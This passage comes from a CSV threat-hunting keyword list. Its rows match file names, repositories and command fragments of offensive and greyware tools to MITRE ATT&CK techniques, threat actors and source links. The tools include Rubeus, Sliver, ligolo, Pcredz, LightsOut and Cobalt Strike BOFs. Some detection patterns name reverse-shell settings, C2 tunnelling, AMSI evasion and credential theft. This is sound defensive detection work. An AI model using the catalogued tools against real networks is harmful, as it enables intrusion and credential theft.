T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"*LDAPWordlistHarvester.ps1*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" +"*LDAPWordlistHarvester.py*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" +"*LDAPWordlistHarvester-main*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" +"*ldd2bloodhound*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" +"*ldeep cache *","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*ldeep ldap -u *","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*ldeep*activedirectory.py*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*ldeep*ldap_activedirectory.py*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*ldeep_dump_users_enabled.json","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*ldeep_dump_users_enabled.lst","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*ldeep_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ldif2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ldifde.exe -f *\temp\*.txt -p subtree*","greyware_tool_keyword","ldifde","using ldifde.exe to export data from Active Directory to a .txt file in the Temp directory","T1018 - T1005 - T1077.001","TA0007 - TA0005 - TA0002","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*leaky/leakbuf.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*leapsecurity*","offensive_tool_keyword","Github Username","github repo name hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/leapsecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*legalhackers.com/exploits/CVE*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*lejgfmmlngaigdmmikblappdafcmkndb*","greyware_tool_keyword","uVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*lem0nSec/ShellGhost*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*lengjibo/FourEye*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*Leo4j/Invoke-SMBRemoting*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" +"*LetMeOutSharp.*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" +"*LFI scanner checks.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*lgandx/Pcredz*","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","1","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" +"*LHOST=* LPORT=*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*LHOST=0.tcp.ngrok.io*","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008","TA0011 - TA0002 - TA0004","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*liamg/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*lib/Bruteforcer.cs*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" +"*lib/ForgeTicket.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*lib/S4U.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*LibcRealpathBufferUnderflow/RationalLove.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*libFuzzer-HOWTO.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*libnfc_crypto1_crack a0a1a2a3a4a5 0 A 4 B*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*libnspr_nspr_log_file_priv_esc.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*libreoffice2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*libs/bofalloc*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*libs/bofentry*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*libs/bofhelper*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*LibSnaffle.ActiveDirectory*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" +"*LibSnaffle.FileDiscovery*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","0","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" +"*libSSH-Authentication-Bypass*","offensive_tool_keyword","POC","LibSSH Authentication bypass CVE-2018-10933 exploitation tool","T1210 - T1573 - T1553 - T1003 - T1059","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nikhil1232/LibSSH-Authentication-Bypass","1","0","N/A","N/A","1","6","2","2018-12-19T15:46:37Z","2018-12-19T15:33:00Z" +"*libwireshark16*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*libwireshark-data*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*libwireshark-dev*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*libwiretap13*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*libxpc_mitm_ssudo.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*libxselinux.old*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*libxselinux.so*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*lightsout.py*","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","3","243","29","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" +"*LightsOut-master.zip*","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","3","243","29","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" +"*ligolo.lan*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*ligolo_darwin*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*ligolo_linux*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*ligolo_windows*.exe*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*ligolo-master*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*ligolo-ng -selfcert*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*LinEnum.sh*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" +"*LinEnum-master.ip*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" +"*link_tcp 127.0.0.1 *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*linkedin2username.py -u*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*LinkedInt*","offensive_tool_keyword","LinkedInt","LinkedInt: A LinkedIn scraper for reconnaissance during adversary simulation","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/mdsecactivebreach/LinkedInt","1","0","N/A","N/A","5","463","112","2023-05-23T23:34:22Z","2017-07-12T12:58:47Z" +"*linpeas_builder.py*","offensive_tool_keyword","PEASS","PEASS - Privilege 